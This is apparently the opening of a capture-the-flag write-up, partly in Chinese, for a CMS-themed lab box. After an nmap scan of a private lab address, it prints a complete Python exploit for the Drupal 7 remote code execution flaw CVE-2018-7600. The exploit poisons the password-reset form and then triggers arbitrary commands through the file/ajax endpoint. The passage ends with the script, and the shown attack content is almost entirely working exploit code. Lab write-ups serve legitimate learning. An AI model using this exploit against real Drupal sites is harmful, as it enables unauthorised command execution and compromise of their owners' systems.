This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag.
Hint: Proceed in the given order :P
信息搜集
nmap -sV -sC -A 192.168.169.143 发现开放了22 80 5000 8081 9001端口
import requests import argparse from bs4 import BeautifulSoup
def get_args(): parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py", formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50), epilog= ''' This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57 by poisoning the recover password form (user/password) and triggering it with the upload file via ajax (/file/ajax). ''') parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)") parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)") parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)") parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)") args = parser.parse_args() return args
def pwn_target(target, function, command, proxy): requests.packages.urllib3.disable_warnings() proxies = {'http': proxy, 'https': proxy} print('[*] Poisoning a form and including it in cache.') get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command} post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'} r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies) soup = BeautifulSoup(r.text, "html.parser") try: form = soup.find('form', {'id': 'user-pass'}) form_build_id = form.find('input', {'name': 'form_build_id'}).get('value') if form_build_id: print('[*] Poisoned form ID: ' + form_build_id) print('[*] Triggering exploit to execute: ' + command) get_params = {'q':'file/ajax/name/#value/' + form_build_id} post_params = {'form_build_id':form_build_id} r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies) parsed_result = r.text.split('[{"command":"settings"')[0] print(parsed_result) except: print("ERROR: Something went wrong.") raise